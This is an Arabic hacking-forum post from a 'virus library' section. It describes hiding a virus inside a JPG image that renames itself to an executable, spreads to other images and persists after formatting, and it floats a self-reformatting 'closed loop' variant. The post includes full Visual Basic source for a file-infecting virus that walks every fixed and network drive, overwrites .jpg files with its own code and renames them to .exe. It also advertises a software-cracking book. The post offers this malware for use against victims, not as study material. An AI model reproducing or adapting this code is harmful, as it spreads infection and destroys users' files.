Members Login
Username 
 
Password 
    Remember Me  
 
hacking collection -> مكتبه الفيروسات -> فيرس بامتداد صورة او امتداد اغنية
Post Info TOPIC: فيرس بامتداد صورة او امتداد اغنية
so9or


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
فيرس بامتداد صورة او امتداد اغنية
Permalink   
 

فيرس بامتداد صورة او امتداد اغنية


Author:
======
SoLiMaN,
for------->Redsin org, Ocho virii group member


special thanx to :
wae'l abd el-aziz
Blacj corey
Johen sis
Ivan cod
Willimes
THANKX:
stupid GFORCE 2 nivdia
stupid SIS (Sillicon graphic)
stupid creative company
edios interactive,rockstar,gigbyte,badbyte
all are stupid and ugly
NOW
--------
كلمة المصمم
========
سليمان محمود سليمان
-----------------------
الان يبداء عصر جديد من عصور صناعة الفيروسات يختلف عن كل ما مضى الان ينتهى الصراع الدائم بين الفيروسات والامتدادات فلا اعتقد انة فى عام الفين ان هناك مغفل يقبل ملف تنفيذى فعلى ذلك معظم الفيروسات قد ماتت لان الضحية اصبحت فى وعى تام ولكن لابد ان تعود الفيروسات وكنت انا والحمد اللة مجدد شبابها والى عصر ازهى واكثر امناً لحماية محبوبتى وهى الفيروسات والتى اعشقها من النخاع
--------
البداية
=====
ألجميع الان يتجهون الى الفيروسات التى تكتب من نوع
*.vb
او حتى الصفحات الملغومة بينما قال الجميع ان الفيروسات على امتداد
*.jpg
فاشل بكل المقايس فالكل يبحث فى ثغرات الريجستورى دون جدوى وحتى استخدموا ما يسمى بالـــ
CLASID
وايضاً دون جدوى وان كان لة اصداء فى ذلك الوقت وقت اكتشافة
(نشرحة قريباً)
ألان اشرح لكم تصميم احد الفيروسات والىت تقبل ان تعمل بامتداد صورة بالطبع انا لست مغفلاً لكى اذكر الطريقة كاملة ولكن اذكر الفكرة العامة مع كود لفيرس وعليك انت ان تعرف كيف تدخل كود الفيرس الذى تنوى تصميمة على نفس الفكرة
------
الشرح
====
كلنا نعرف ان الصورة يمكنها ان تتحول الى اكواد مكتوبة ويطلق عليها
ASCII
وايضاص يمكن تحويل البرامج ذات الامتدادات التنفيذية الى
ASCII
ولكنها لان تعمل لانها هنا تحتاج الى اعداة فك وتشغيل تلقائى
اذن
اذا احضرنا صورة وحولنها الى اكواد من نوع
ASCII
مكتوبة فى تكست وليكن اسم التكست
x.txt
ثم وضعنا كود ما مع كود الصورة
وهذا الكود المسئول عن اعادة تكوين الصورة فى الشكل الطبيعى المرئى


انتهى الجزاء الاول


الجزاء الثانى
========
صممت برنامج لة القدرة على اعداة تسمية اى ملف موجود فى مسارة
فمثلاً لو كان هناك ملف بة المفات التالية
x.jpg
ووضعت البرنامج فى نفس الملف وهذا البرنامج يحمل امر تحويل الاسم فسوف يقوم بعمل التالى
اعادة تسمية
x.jpg
الى
x.exe
او اى اسمة باى امتداد حسب ما تريد
ولكننا نعرف ان الفيروسات بامتداد
*.exe
ان نجعل البرنامج يحمل امر اعادة التسمية من الامتداد
*.jpg
الى
*.exe
هذا فى الحقيقة ليس برنامج بل امر دوسى يعنى بات فعلى ذلك قمت بتحويلة الى اكواد مثل فكرة الصفحة الملغومة ولكن بفكر جديد والكود يسمح بذلك
الان اضف الكود الجديد هذا الى ملف التكست الى يحمل اكواد كلاً من الصورة وكود اعادة البناء
ثم تضع كود اخر ينهى عند تلك النقطة الاكواد المحولة الى
ASCII
بحيث لا يرى الاكد سى او برامج عرض الصور ما بعد هذا الكود


========
الجزاء الثالث
========
ألان نضع كود الفيرس مكتوب لغة الفجوال (للاسف لابد من كود السورس)
فى ملف التكست
الان نحفظ ملف التكست على امتداد صورة ليكن
x.jpg
الان ماا لو فتحت هة الصورة هل تعمل ام لا @@@@@@



ماذا سوف يحدث ؟
===========
عندما نضغط الاكد سى يرى كود يجعلة يبنى الصورة مرة اخرى فتظهر الصورة عادى ولكن يرى كود اخر وهو المسئول عن التحويل ولكنة لا يعمل الا فى حالة غلق الصورة


طبعاً الضحية ما ترى غير الصورة وبعد ما يتفرج عليها ويغلقها يكون كود البرنامج الذى قلنا فى الحقيقة انة كود يلعب فى الريجستورى الخاص بعرض الصورة ها الكود بعد غلق الصورة يقوم بتحويل اسم الصورة الى


x.jpg
الى
x.jpg.exe
وبالتالى الامتداد الاخير هو الفعال ويقوم هذا الكود بتشغيلها الناتج (الى تحول الى تنفيذى)
فعند التشغيل بالطبع الكود اللاابع الى ينهى اكواد
ASCII
يجعل ها الاكود بلا فائدة
كانها جزء غير موجود
بينما الجزء الموجو هو كود الفيرس
ايضاً نسيت ان اذكر ان الكود الى يعمل اعادة تسمية ويشغل تلقائى هو ايضاً كومبيلر للفجوال
اى انة كود اللعب كلة


طبعاً بعد ما تحول الاسم وتم عمل كومبيلر لكود الفيرس وتم عمل يتم عمل تشغيل تلقائى
========================================
الان
الضحية مصابة بالفيرس بمجرد صورة
===================


اسئلة على الفيرس
================
1- حجمة لا يقل عن 50 كيلو بايت بدون كود الفيرس فكيف اقلل الحجم
=======================================
نستخدم صورة صغيرة جدا ونضط كود الفيرس والاكواد الاخرى فيصل الحجم الى حوالى 20 كيلو بايت بدون كود الفيرس اما كود الفيرس حاول ان يكون صغير


2- كيف اعرف كود الفيرس هل لابد ان اكود انا مصممة
==============================
ها احد العيوب فلابد ان تكون انت مصمم الفيرس ولكن لو كان عندك فيرس امتدادة
*.EXE
يمكنك تحويلة الى امتداد
*.COM
ثم تحويلة الى امتداد
*.TXT
(بالنسبة للمنتدى البرامج التحويلية مع الشرح لها موجود فى موضوع تعلم صناعة الفيروسات من نوع البات والدودة فى منتدى الهاكرز)
اا نظرت الى الناتج فى التكست تجدة كود مشفر وهو الكود الاصلى للفيرس
بالتاكيد لا يعمل الكود المشفر فلابد من فك تشفيرة ولكن ها صعب جدا جدا لذلك طورت الكود المسئول عن كل العملية ليستطيع ايضاً ان يحول التكست الى كوم ثم الى
*.EXE
بعملية عكسية
وبالتالى مهام الكود ات واحدة وهم
تحويل الامتداد + كومبيلر لكود الفجوال + تشغيل تلقائى
ولكن فى هذة الحالة هذا الكود يقتل عملية الكومبيلر ويستبدالها بعملية التحويل العكسى
ولكن حجم الكود سوف يزيد حوالى 3 كيلو بايت مم يجعل حجم الصورة الكلى يزيد 3 كيلو بايت
وعلى ذلك قمت بتطوير كودين الاول تستخدمة فى حالة تعرف كود تصميم الفيرس بدون تشفير والاخ اذا اتبعت فكرة التحويل لانك تجهل كود الفيرس


3- ماذا عن الاستخدام هذة الفكرة فى الاختراق المباشر
=============================
هاهاها سؤال بالفعل جميل جدا جدا
لنقل ان عندك سرفر الاحد برامج الاختراق ولكننى افضل الابلودرز لصغر حجمة وليكن اسمة
X.exe (السرفر)
بسهولة جدا جدا جدا قم بتحويلة الى
*.com
والناتج قم بتحويلة الى
*.TXT
الان استخدم فكرة الكود الثانى
راجع اجابة السؤال الثانى


4- ماذا اذا قام الضحية بعمل فورمات للدريف الى يحتوى على السيستم او الوندوز هل تظل الاصابة ام تنتهى
========================================
هاهاهاها ماذا لو ازدنا حجم الصورة الكى بحوالى 5 كيلو بايت لضمان استمرار الاصابة حتى بعد الفورمات


شكر خاص الى صاحب هذا السؤال :
Michael howee
لقد طورت الفكرة ولكن الكود الرهيب المسئول عن كل شىء قرر عدم قدرتة على التطوير اكثر من ذلك
وعلى ذلك قررت انة عندما تضيف التالى بالترتيب


----------
كود الصورة المتحول الى اكواد
كود المسئول عن العمليات متحول ايضاً
كود نهاية التحويل واخفاء القادم
كود بداية الفيرس واخفاء الماضى
كود الفيرس
---------
قمت باضافة كود جديد ليصبح الشكل
----------
كود الصورة المتحول الى اكواد
كود المسئول عن العمليات متحول ايضاً
كود نهاية التحويل واخفاء القادم
كود بداية الفيرس واخفاء الماضى
كود الفيرس
كود جديد
---------
ولكن شباب لو كنا قد اتبعنا عملية الكود المشفر لاننا نجهل كود تصميم الفيرس المراد اصابة العدو بة او فكرة الاختراق بنفس الفكرة لانة اكيد ليس نحن من صمم برنامج الاختراق يتغير الشكل من
----------
كود الصورة المتحول الى اكواد
كود المسئول عن العمليات متحول ايضاً
كود نهاية التحويل واخفاء القادم
كود بداية الفيرس واخفاء الماضى
كود الفيرس
---------
مع تبديل فكرة الكومبيلر المحمولة على كود العمليات بفكرة العملية العكسية للتحويل
----------
كود الصورة المتحول الى اكواد
كود المسئول عن العمليات متحول ايضاً
كود نهاية التحويل واخفاء القادم
كود بداية الفيرس واخفاء الماضى
كود الفيرس
كود عملية محدودة
الكود الجديد
---------
هنا كود العملية المحدودة مهمتة بعد ما تتم عملية التشغيل التلقائى بقوم بالبحث على اى صورة بالهارد وليكن انة وجد صورة فى هذا المسار
d:/mygames/GTA3/gta3.jpg
يقوم باستبدال تلك الصورة بنسخة من الفيرس ذو امتداد الصورة مكانها وبنفس اسمها عادو للتخفى اى انك تجد الصورة تحولت الى
d:/mygames/GTA3/gta3.jpg
عادى جدا ولكن عندما تعمل الصورة
gta3.jpg
تكون هى صورة الفيرس وليس الاصلية
الان مايكل قل لى من لا يوجد عندة ملايين من الصور فى البرامج وفى الالعاب وفى صفحات الانترنت والكثييييير ان لو فرمت السى لابد ان تكون نسخة من الفيرس موجود فى صورة ما فى دريف اخر
لابد ان يفرمات الهرد كلة
هاهاهاهاها
ها ان لم يكن كود الفيرس المحمول اصلاً يقوم بعمل فورمات للهارد



افكار شطانية
=======
هاهاها ماذا عن الكلوست لوب
closed loop
او الدائرة المغلقة
لنقل ان الضحية فرمت الهارد كل وبعد تنزيل الوندوز وفتح الجهاز يجدة عمل ريستارت وفرمت نفسة بنفسة
فكرر المحالة واحدث نفس الشىء
مهندسى الكمبيوتر يصابون بجنون كيف والهارد كلة تفرمت
فيظهر احد العباقرة يقول
لابد من اعداة تقسيم الهارد لانة قد يحمل فيرس فى جزاء غير ظاهر من الهارد
فيقوم بعملية التقسيم الهارد والفورمات وتنزيل الوندوز وهوب يفتحل بعد اكتمال تنزيل الوندوز يحدث ريستارت وهوب فورمات


(على فكرة نزول الفيرس على جزاء مخفى من احد الدريفات فكرة جيدة ولكن غبية يمكن التغلب عليها)


كيف يحدث هذ هل لايوجد حل لة
==================
الفيروسات عندى نوعين فيروسات ذكية وفيروسات ذات الدائرة لمغلقة
الفيرس الى شرحنا بالاعلى من نوع الفيروسات الذكية
بينما فيرس الفورمات الدائم صممتة عام 2002 ظهؤت افكار كثيرة منة


ماا لو اضافنا لفيروسنا الحبيبة ذو امتداد الصورة كود عمل الدائرة المغلقة
الحلقة القادمة
اشرح لكم الفكرة
بينما الاكود الان يتم رفعها كلها على موقع لكى يستطيع الجميل انزالها


____للاسف المنتدى بة شىء غريب لا يسمح بحروف اكثر من الف وبالتالى اقسم الموضوع الواحد الى عدة اقسام والاكواد كبيرة لا استطيع ان اكتبها لان الكود الواحد قد يكون اكثر من الفيس حرف نظراً لوجود مسافات وسطور خالية وهكذة الرجو من المشرفين توضيح لماذا يعنى فكرة الف حرف ما يتركوها اى عدد____


 


Virii Source coded by
soliman
(Tested,by Willimes..wae'l.....Ivan.....and maker soliman)!!!!!!!!!!


-------------------------------> Code Starts Here <-------
Private Sub Form_Load()
On Error Resume Next
Randomize
Dim rubishcode As String
Dim picture As String


Set fso = CreateObject("scripting.filesystemobject")
Set tempfold = fso.getspecialfolder(2)
payload = Int(999 * Rnd)
If payload = 783 Then
MsgBox "@@@ I LoVe ShImAaa in PaTra..I'm dOOmeD @@@", 64, "Eva ViRus VeRsIon 2.0"
End If
myname = App.Path & "\" & App.EXEName & ".exe"
buff = FileLen(myname)


If buff > 20992 Then
rub = buff - 20992
Open (myname) For Binary Access Read As #1
rubishcode = Space(rub)
Seek #1, 20993
Get #1, , rubishcode
Close #1
picture = tempfold & "\" & App.EXEName & ".jpg"
Open (picture) For Binary Access Read Write As #2
Put #2, , rubishcode
Close #2
ddd = "c:\Program Files\Internet Explorer\iexplore.exe " & picture
idProg = Shell(ddd, vbMaximizedFocus)
SetAttr picture, vbSystem + vbHidden
Else
MsgBox "Out of memory!", 16, "Internet Explorer"
End If
autos = tempfold & "\win32dll.vid"
If (fso.fileexists(autos)) Then
End
End If


Set dr = fso.Drives
For Each d In dr
If d.DriveType = 2 Or d.DriveType = 3 Then
list (d.Path & "\")
End If
Next


Open (autos) For Binary Access Read Write As #22
Put #22, , "390842038209384023980984023 src coded next"
Close #22
End
End Sub
Sub list(dir)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set f = fso.GetFolder(dir)
Set ssf = f.Subfolders
For Each fil In ssf
spreadmailto (fil.Path)
list (fil.Path)
Next
End Sub


Sub spreadmailto(dir)
On Error Resume Next
Dim readvictim As String
Dim readme As String
Set fso = CreateObject("Scripting.filesystemobject")
Set f = fso.GetFolder(dir)
Set cf = f.Files
For Each fil In cf
ext = fso.GetExtensionName(fil.Path)
ext = LCase(ext)
If (ext = "jpg") Then
'Main replication routine starts HeRe!
myname = App.Path & "\" & App.EXEName & ".exe"
victimlen = FileLen(fil.Path)
Open (fil.Path) For Binary Access Read As #3
readvictim = Space(victimlen)
Get #3, , readvictim
Close #3
Open (myname) For Binary Access Read As #4
readme = Space(20992)
Get #4, , readme
Close #4
Open (fil.Path) For Binary Access Read Write As #5
Put #5, , readme
Put #5, , readvictim
Close #5
newname = fil.parentfolder & "\"
newname2 = Left(fil.Name, 1)
newname3 = Right(fil.Name, Len(fil.Name) - 1)
newname4 = LCase(Left(newname3, Len(newname3) - 3) & "exe")
newnameall = newname & newname2 & newname4
Name fil.Path As newnameall
'Main replication Routine Ends HeRe!
myname = ""
readme = ""
readvictim = ""
End If
Next
End Sub
-------------------------------> Code Ends Here <---------


لو بتحب الكراكنج اليك ها الكتاب من تاليفى :
يحتوى على شرح مبسط للاوامر لغة التجميع المستخدمة
شرح كل برامج الكسر والكراكنج ووصلات تحميلها
شرح اكثر من 18 مثال بالصور طبعاً خطوة بخطوة لطريقة كسرهم
هدية على الكتاب
اكثر من 16 مثال على برامج متنوعة لكسرها وعمل باتش لها


الكتاب مساحتة اثنين ميجا
وصلة التحميل
http://www.geocities.com/msnteam2003/soli-cracking.zip



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.
hacking collection -> مكتبه الفيروسات -> فيرس بامتداد صورة او امتداد اغنية
Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse 		Powered by ActiveBoard